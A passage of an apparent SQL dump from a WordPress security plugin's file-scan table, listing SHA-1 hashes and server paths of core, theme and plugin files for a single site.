1d401521c8be3c958b415f131','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/wp-cerber.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c431409d3c355f186bb89e8e795f47a36a4ba687','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-editor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c443aa824bc5e56bdcc1ced55a5b429f3a81d1f3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/elements/section.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c489165c4153d9959700a2309d9096e42da6c6e7','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Curve25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c48e8a10ff29842e9ed48391042dcfdb6338bda4','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/template-parts/entry-author-bio.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c496f00128b77d59acb415a59212c5e67432cf09','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/modal-prompt.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c4c0c2ea176a728cdeff514d1db514e50abfc760','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c4d63e9201a5475ae34c9fc6b268eac69c916dcc','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/flusher.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c4e8d657b854f2a5711ef49a7d7121f8a4bc23f8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c4f257e67ce3bd6261703ab91c2c36eef21f823e','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/footer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c51831e8dfcc13272dc7d349185e793a33ba6ed3','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.audio.ogg.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c5682ec19ece0d20cc40d11ce5047d31e7295c2c','/home/westonspirit.org.uk/public_html/wp-admin/includes/image.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c5e97436df07df62f6434dc666c342edd71010f0','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/libraries/bfi-thumb/bfi-thumb.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c5ee8532abb5e8c00f6061c23cfafa311453c80a','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-posts-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c5f18990f28251330dcb6ab927f92c103fb9a0fc','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/autoload.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c614947a1d7591a9908ba6942bc3f219ef7c5072','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Auth/Basic.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c61e794b405fdc9b8f1e147cddc968cd22e21808','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-ms-users-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c626ab49c511957417bbadb9389a6c0ee5e75a5f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium_legacy.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c658c2cf786733558b6989c61127eec5e35377ff','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-theme-upgrader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c658ef0bdc3fce09c7c833748cb8721b49e59362','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/page-templates/templates/header-footer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c676e779617f51081815bf5b75fdc814dec04ff5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/schemes/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c69559581e274063a56a9db3ee237ef5b1b28720','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c6b2d8cc2782774ce6cf9072286e622dc3e3e17f','/home/westonspirit.org.uk/public_html/wp-admin/setup-config.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c6beb1cb63b06a9b3a278fc49c9c412092fb48aa','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/actions/url.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c6e93a1edf0cf59a84a735e96de66987a9184732','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c72ee16b907d82e6aedac252b3dcab68288342d6','/home/westonspirit.org.uk/public_html/wp-includes/rest-api.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c74216011b20a76ddee81c1b7ae14b2bc3e291fb','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c74453cdaf657ac55ffa9356dc17ed35de4bf86a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/tabs/settings-background.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c74a7e24989125f02e5e1b619ff993dec2e1f7ae','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/template-parts/content-none.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c7b1a020ec80057e07d6f180647e38045a936e94','/home/westonspirit.org.uk/public_html/wp-includes/class-IXR.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c7be2fc868b2a550f503ee89e2f20875987bc6c9','/home/westonspirit.org.uk/public_html/wp-includes/robots-template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c7c169b8b0a4a37ff33670da07fb6af7a17c35b6','/home/westonspirit.org.uk/public_html/wp-includes/Requests/IDNAEncoder.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c7e382f5c309fb25bdcb493881adf7ba0d4c6c01','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Auth.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c7f04a7425b051c439f689c059f52fefe5b55dd9','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c807cd5697d0b4be79a4a3f2582d2c7963bb3622','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/template-library/sources/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c83b11526721f0a532005e2ab993c879bc952a76','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/admin-templates/beta-tester.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c8449ee26aad91be3c3d7342b0b6e7b2d42b2b1a','/home/westonspirit.org.uk/public_html/wp-includes/Text/Diff/Engine/shell.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c858c0c13e970beb58f520cb9adbb832e46c2e76','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c892355a387f518c8d8d18c0377cfb7e831d2891','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c8bbb980a24a2e79cecce87fa77db2a323b23617','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/settings/validations.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c8c8f5c9813d0db222fd00e82bc12e0692ca5f68','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-custom-image-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c8e8348d7a0938748974b4a24541760c6954f636','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c8ea28037819cbcbb71fac74114e6181f101aa83','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/history/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c8fa3da7486a833cd3b0c8c8ebdc9ef03852de72','/home/westonspirit.org.uk/public_html/wp-admin/includes/list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c90da13e2a5304497ce2ed3971695cbe5187b1f8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/waf/pomo/mo.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c93444a00cbd8f6810580377a2da433e54a24f24','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/wordpress.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c9619ac0ec7ab4dd3e383e658aa8b0149fa5f403','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c98f89ab182738d45f4804622c8381c691bdc2ce','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-toggled.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c9976287c336e0429eb89ddc1ea23dbf13b12e3c','/home/westonspirit.org.uk/public_html/wp-includes/blocks/categories.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c9f3ab10fc684a29294bba9876259beb4d616523','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns/text-two-columns-with-images.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'c9fcb04ad26a9ff7ac44ea9d78185ac96eab87b4','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.audio.ac3.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ca66fdc6811431e365bd76de295e75f6fd324df3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/dashboard/options-group-alert.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'caa9f506f97a2ddaffbffa16d57215bcbfb28827','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/frontend/render-modes/render-mode-base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cab0d8f939dbe351165f095705f455c6a1e417b7','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-settings-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cab9cb1d889c865eb0a8a407d0813d2537b50ee8','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/content/content.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cad1d038c7c602ac97f65f017439918a273c6c8b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/utils/collection.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cae010cf38b46f5458b6b95db540639c9512e41b','/home/westonspirit.org.uk/public_html/wp-includes/IXR/class-IXR-base64.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cae0bce5c568169929d85ad7d92f53fc7d1858ae','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Salsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cb4b4a835db62bd2a515ce6c34f16b54b7ce246c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/video.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cb80679084ebf26c05ca41e52084d4a8c73bf8d3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/groups/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cb8c4c41dfca4ce60b09df7df968b3c26fe82790','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-site-query.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cbac1b07d18c15d7db2cc5fe32d5a474fe021d76','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/css/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cbb102bb6d780a37eccf415fa71e8189243445aa','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cbd28633db5d2998600415d5e3bcc51377b013d2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/jetflow.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cbdb2f0537d6bbfad66f9607a3611df7535d66da','/home/westonspirit.org.uk/public_html/wp-includes/blocks/latest-posts.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cbee99fc50de558c6e961e2ef9830bcdcee9e5cc','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/icons.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cc1a49c3d8ad061606951dc6205618bf55f395be','/home/westonspirit.org.uk/public_html/wp-includes/load.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cc3ceff3f0792ee2a1c368ce271624a09db8fbf5','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-block-patterns-registry.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ccd7f6f9799694621f91b0b6fe75bb93dac709fd','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-debug-data.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ccf7b38dadc91d3f6e961709ecf0def524b506c0','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-nav-menu-location-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cd6ce141c30e32807a0b34efa8ce5f17531c45f6','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-registered-users.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cd937ac6f52cb2d581922503806721c5908fc1ed','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/text-editor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cda7dd10a257a025ea54bc8ef10b8ee996edc538','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/tgm/loader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cdc80cfa48fca8b7b5d172a13798e1c7ad1bcdb7','/home/westonspirit.org.uk/public_html/wp-includes/Text/Diff/Renderer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cdda965d196fb5d1ab7d98d7526a0c8815d47a3b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cddcebbbd8e8fdbe77697a65507bbefda88bd223','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cdf862ddb60508fd703729e99adf44ae7b6179e7','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/vendors/breadcrumbs/breadcrumbs.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ce1115966f4cfb4c6c9b2022c4038601e5d0a9af','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfScanEngine.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'ce890744a49da4dedd79c75b347d507c8ea145fe','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Salsa20.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cf21d16088464b541f85e16eb1f91c6b842d155f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cf5c00fe1a513effd4fa077c02aeb175e9bc76ac','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Net/IPv6.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cf7f498379a5fc383bbbd32def2d948f62137024','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/inc/template-functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cfa97edb6157e3f848fce98b163b22041b917dad','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/customizer/core/customizer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cfad12dcf0677cba3140778845bafa0062fbb86a','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/inc/customizer/customizer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cfb328243b48768d4083f9023c3c71c119bc699a','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/502.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cfb9f647e815b661deadfde7080d37a93c1060ee','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'cfcbf72c1e3e3817778c8540797983c8f25cc48c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/Cached.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d02679bff398cfe8c78725cc46ff210dd1655288','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Cookie/Jar.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d07ac4c9dd8f4ac6aeabcd7b553be465fcb47416','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/textarea.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d085f181b80d1fe1fce78d83862f14280ca784f1','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d0dd97dbd69aa559108c323c46cb09f2666716f2','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/group.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d13f40daae4499798766163658f1a83636220f3c','/home/westonspirit.org.uk/public_html/wp-admin/network/site-settings.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d140b40c4bcad4de07ab229bbde74e74d8f4f25e','/home/westonspirit.org.uk/public_html/wp-admin/erase-personal-data.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d174f68db4ca3a4ba7c3c5ad32f5d9325f9a9e28','/home/westonspirit.org.uk/public_html/wp-includes/ms-files.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d194b415f8c4c9fdb606ad4301beb688ff38d719','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d205b2b189b891b51ebcd17a5e4206bf29e31052','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/database/schema/216.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d2489c319a353b9ccbaecc3cf5b152006b142090','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/finder/template.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d25c31b15d6958cb5a5b9d473bc54fa479c8ad8a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/IetfCtx.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d26ac7ce97843ba53ef7321a591c97679daaf2bf','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d272746df4aca7e5c6491096c61e7984494fcf81','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/hover-animation.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d27a467f3d9206ee640502f016e3be7bbbe02ea9','/home/westonspirit.org.uk/public_html/wp-includes/ms-site.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d2b74ddba7fc9b4613e34ef9d4c71c4fb3edcd0a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/SodiumException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d2e8d6e4f21cc339dad07b4277c52dc738065d3d','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/role-manager/role-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d2ed0c2783a6691990fb625901f2e130d0c14270','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d356e7624c36a43814913d8a22f2667c3691968d','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-walker-category-checklist.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d37f77f6a21aeceef2947b5aabaefd5300dadcb0','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/kit-library/data/exceptions/wp-error-exception.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d385a7aa6c5aad9dbfbeaba379da915b4bb6898c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/section-subtitle.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d38e64fc7db63fab6818a5c5cc3701722ba13bb6','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-media-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d3d3c527701b09b7f0a293548f9f07ba151c4cc2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d3e3f5b121cb5061963df81e1476864452e5fb74','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d452dd0343af81e2c357d25cc00d012d7f74fb2c','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfVersionCheckController.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d46e8b31c603e46127b40aad16df0aa7e3990735','/home/westonspirit.org.uk/public_html/wp-includes/default-widgets.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d483f3f906f833ed7b02d70dc71777e4e7ac27c0','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/comments.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d483fbdd3369458c9860d93d34fa0e6bf41f5c39','/home/westonspirit.org.uk/public_html/wp-config.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d48d364c76a5ec94e782bab2122385688f26f324','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/api/api-export.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d49131dec054a328f488e0d82e6f37252852e43e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/options/option-label.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d491fcc28e3b725765bbc96e5453f32f8d478575','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d4b3b07b5ffcdb44e4bc2f940f8ebb39c7b99642','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-query.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d4bd55d96d502bf08aafe3c34f7be60adaec6a8e','/home/westonspirit.org.uk/public_html/wp-includes/PHPMailer/Exception.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d4dbc8e453a8ebf71d0a8b78bab9927d906088c8','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d4ecf52fc063031d3c3f8cbf644aac5358c53b00','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/image-gallery.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d521eb12bd517376121369e3e4f803426710de0b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/onboarding/plugin-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d527e3643536ec0aaed361b104ecf7e1be4c15cf','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-automatic-upgrader-skin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d55bfdb3157d2d186ad68d531a83b1d5a71f5571','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/settings/base/model.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d598ead180726862fee5c84b26c51b1b075956bd','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/db-upgrades-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d5b89402b22803fb410ceada92ab5e5f6504a58a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/base/background-process/wp-async-request.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d5c32f53eb9e943932a6495112a4eea5bc4ae2d3','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/admin-top-bar/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d5d047f0ceb6ee7a3ce5689e3985cd75993f2161','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns/large-header-button.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d5d0802679140f61a6f31d6639e3f2bfc40f3969','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d5d57c1c0dd2a9c85d7c18d553f191521e057f0b','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/inc/helper-functions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d5f48831e73bc01833ab9f6389936f46d1ada295','/home/westonspirit.org.uk/public_html/wp-includes/pomo/translations.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d608bb0e8bed1ce17128c55a50d4227b77296c8c','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/monitor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d60b77838d6f654b1fc103e63e83e93e83ee06d6','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-cronjob-handler.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d63644536fdc90bfa8faf16080b805a1be0796aa','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d6575b3c646de29056de5f71850a43cdeeb79208','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/actions/error.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d660f8fe72629364d02c7ac110bacd69c8bd15e3','/home/westonspirit.org.uk/public_html/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'d6645e7a2a8f2a075f3ffead5a0713cddbbc2c40','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/compatibility-tag/base-module.php',0,'','','',0,0,0,0,0,'',''),(1629897503